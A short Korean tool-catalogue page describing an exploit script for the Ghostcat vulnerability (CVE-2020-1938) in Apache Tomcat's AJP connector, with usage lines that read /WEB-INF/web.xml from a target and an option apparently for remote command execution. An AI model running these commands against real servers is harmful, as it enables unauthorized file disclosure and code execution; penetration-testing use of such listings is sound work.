해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!
CVE-2020-1938(Ghostcat)에 대한 익스플로잇으로, AJP 커넥터를 통해 취약한 Apache Tomcat 서버에서 파일 읽기 및 원격 명령 실행을 가능하게 합니다.
커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.
모든 도구 탐색
도구 컬렉션을 둘러보세요
python3 tomcat.py URL -f /WEB-INF/web.xml
예시:
python3 tomcat.py 127.0.0.1 -f /WEB-INF/web.xml -p 8090
추가: --rec 1
참고: https://www.t00ls.net/articles-55062.html